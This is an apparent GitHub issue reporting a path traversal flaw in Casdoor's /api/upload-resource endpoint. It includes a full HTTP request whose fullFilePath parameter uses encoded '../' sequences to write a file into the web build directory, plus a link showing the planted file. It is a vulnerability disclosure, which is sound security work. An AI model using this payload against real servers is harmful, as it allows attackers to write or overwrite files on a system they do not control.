You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hi, I found a security issue, when the upload provider is Storage Local File System, the fullFilePath parameter of the interface /api/upload-resource will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below:
POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider_storage_local_file_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider_storage_local_file_system HTTP/1.1Host: door.casdoor.comCookie: casdoor_session_id=2fd9ab275d8d65ea296ab327fd92166aContent-Length: 192Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "macOS"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJMAccept: */*Origin: https://door.casdoor.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://door.casdoor.com/resourcesAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundaryUPAwhIoXMrbemuJMContent-Disposition: form-data; name="file"; filename="spider.png"Content-Type: image/pngI'm here.------WebKitFormBoundaryUPAwhIoXMrbemuJM--
Hi, I found a security issue, when the upload provider is Storage Local File System, the
fullFilePath
parameter of the interface/api/upload-resource
will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below:Then we can find out that the problem does occur by following this link。
https://door.casdoor.com/flag.html
The text was updated successfully, but these errors were encountered: